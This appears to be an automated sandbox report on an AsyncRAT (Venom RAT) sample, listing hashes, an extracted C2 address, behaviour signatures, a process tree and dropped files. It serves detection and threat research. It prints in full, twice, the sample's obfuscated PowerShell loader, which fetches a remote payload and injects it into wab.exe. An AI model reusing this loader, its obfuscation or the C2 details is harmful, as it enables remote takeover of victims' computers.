asyncrat | b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953

General

Target

b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd
Size

6KB
MD5

7b90a6964decffe69d5a3f43d4285498
SHA1

9e2982f4c58624952f26322fd7eff379af540586
SHA256

b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953
SHA512

f95ac4691adb65fe56c981567c2ea79bb786f38305ae0280da1c41f48c7f34d72fdc22737835096046590036353ec33295f1c6378987f1d9354356accd650b68
SSDEEP

96:Svgs1WudsEONjKlXPi3+mB0AT1DLkHjXTIo6wwPtsRmNga74vGyr:SN0ysEOKjMlTxiDEwqtLNga0N

Score

10^/10

asyncrat venom clients execution rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

xvern429.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detects executables attemping to enumerate video devices using WMI 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1960-84-0x00000000006B0000-0x0000000001712000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice
behavioral1/memory/1960-86-0x00000000006B0000-0x00000000006C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 268 powershell.exe
7 268 powershell.exe
9 268 powershell.exe
11 268 powershell.exe
13 268 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

268 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1960 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2996 powershell.exe
1960 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2996 set thread context of 1960 2996 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

268 powershell.exe
2996 powershell.exe
2996 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2996 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 268 powershell.exe
Token: SeDebugPrivilege 2996 powershell.exe
Token: SeDebugPrivilege 1960 wab.exe

flow	pid	process
5	268	powershell.exe
7	268	powershell.exe
9	268	powershell.exe
11	268	powershell.exe
13	268	powershell.exe

pid	process
268	powershell.exe

pid	process
1960	wab.exe

pid	process
2996	powershell.exe
1960	wab.exe

description	pid	process	target process
PID 2996 set thread context of 1960	2996	powershell.exe	wab.exe

pid	process
268	powershell.exe
2996	powershell.exe
2996	powershell.exe

pid	process
2996	powershell.exe

description	pid	process
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	1960	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2444 wrote to memory of 268	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 268	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 268	2444	cmd.exe	powershell.exe
PID 268 wrote to memory of 2896	268	powershell.exe	cmd.exe
PID 268 wrote to memory of 2896	268	powershell.exe	cmd.exe
PID 268 wrote to memory of 2896	268	powershell.exe	cmd.exe
PID 268 wrote to memory of 2996	268	powershell.exe	powershell.exe
PID 268 wrote to memory of 2996	268	powershell.exe	powershell.exe
PID 268 wrote to memory of 2996	268	powershell.exe	powershell.exe
PID 268 wrote to memory of 2996	268	powershell.exe	powershell.exe
PID 2996 wrote to memory of 3036	2996	powershell.exe	cmd.exe
PID 2996 wrote to memory of 3036	2996	powershell.exe	cmd.exe
PID 2996 wrote to memory of 3036	2996	powershell.exe	cmd.exe
PID 2996 wrote to memory of 3036	2996	powershell.exe	cmd.exe
PID 2996 wrote to memory of 1960	2996	powershell.exe	wab.exe
PID 2996 wrote to memory of 1960	2996	powershell.exe	wab.exe
PID 2996 wrote to memory of 1960	2996	powershell.exe	wab.exe
PID 2996 wrote to memory of 1960	2996	powershell.exe	wab.exe
PID 2996 wrote to memory of 1960	2996	powershell.exe	wab.exe
PID 2996 wrote to memory of 1960	2996	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"
3⤵
PID:2896

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"
4⤵
PID:3036

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1960

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
3776dba6c8a172b0daeb3821991f5ee4

SHA1
76f0264af806b73c62a2ba008d63e6b22a995f6f

SHA256
dd4e98a801b37486a71bce44a8e276f6f5538bdcd46158d3a0008e3faebc713c

SHA512
bad4b5ef9fda8c81d06f0a13780c21783baf82ae574e8e52d37299a8e3a7a76bbbbc8f91e5d4f430c317038f7ab49862d1f475870703694cf4ac1da28ae13b1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab257D.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar258F.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Anemotaxis.Saf
Filesize
464KB

MD5
18fc7a00c5b4cd7bf88445aaf24491bf

SHA1
8127f6999587c6b0bfde91fceac9d0106907b9d2

SHA256
38393e1abae0ed937471b6d4196ebbf100921142ea85d266b3505cc24a992fc2

SHA512
0127009c795974510ea898f320450e7bd0b76dd395374c4058adab95e39e27459306cde56de5b39cd38f053513b26eda0d76da34af8cb9ca352daa5d5323ebfb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X1BH1V5JN9IN1C3G0LC7.temp
Filesize
7KB

MD5
2f913e6bad9cb78df3f6e9b549116f23

SHA1
c2c78f059a8717ff1811c874fa09c4f8c922f262

SHA256
18858c04abc85f79b494b4d2eaa3614cf6fb95088d87fee05cf60c0d50c95610

SHA512
f310037b635cc9f3ae1facd99af4e331ac5a13641144d90bba3848dde6094c1055df1ce11d8bd1384ecf42e7b553119ad51cd091ffb5370dfe90406b106c492c

Download Submit
memory/268-8-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-55-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-11-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-9-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-4-0x000007FEF658E000-0x000007FEF658F000-memory.dmp

Filesize
4KB

Download
memory/268-7-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/268-10-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-85-0x000007FEF62D0000-0x000007FEF6C6D000-memory.dmp

Filesize
9.6MB

Download
memory/268-57-0x000007FEF658E000-0x000007FEF658F000-memory.dmp

Filesize
4KB

Download
memory/268-5-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

Filesize
2.9MB

Download
memory/1960-84-0x00000000006B0000-0x0000000001712000-memory.dmp

Filesize
16.4MB

Download
memory/1960-86-0x00000000006B0000-0x00000000006C6000-memory.dmp

Filesize
88KB

Download
memory/2996-56-0x0000000006600000-0x0000000009F10000-memory.dmp

Filesize
57.1MB

Download

Analysis

Sharing